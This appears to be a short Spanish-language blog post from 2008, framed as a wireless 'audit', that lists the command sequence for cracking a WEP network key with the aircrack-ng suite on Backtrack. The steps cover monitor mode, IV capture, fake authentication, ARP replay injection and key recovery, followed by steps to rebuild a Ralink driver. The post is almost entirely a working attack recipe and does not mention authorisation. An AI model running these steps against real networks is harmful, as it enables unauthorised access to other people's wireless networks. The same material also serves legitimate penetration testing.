5 Aug 2008

Auditoría wireless

Supongamos que quiero auditar la seguridad de un acceso wireless. Vale. Y supongamos que tengo el indispensable Backtrack. Vale. Pues manos a la obra:

1. Abrir consola: $ kismet -c rt2500,ra0,ralink
y la opción
L para bloquear en el canal deseado.

2. Para poner en modo monitor: $ airmon-ng start ra0


3. $ airodump-ng --channel (8) --ivs --write /mnt/hda5/casa/ivs/volcado01


4. Otra consola: $ aireplay-ng -1 0 -e (WLAN_00) ra0
(-a BSSID -h mi_BSSID)

5. Otra consola: $ aireplay-ng -3 -e (WLAN_00) ra0
(-b BSSID -h mi_BSSID)

6. Cuando tenga 30.000 ARP,s, unos 380K de archivo: $ aircrack-ng -s volcado*.ivs


Claro que evidentemente mi tarjeta es una Ralink RT-2500. No debe hacer falta pero por si acaso no funciona se puede actualizar su modulo:

$ ifconfig ra0 down
$ rmmod rt2500
$ wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
$ tar -xvzf rt2500-cvs-daily.tar.gz
$ cd rt2500-cvs-*/Module
$ make && make install
$ modprobe rt2500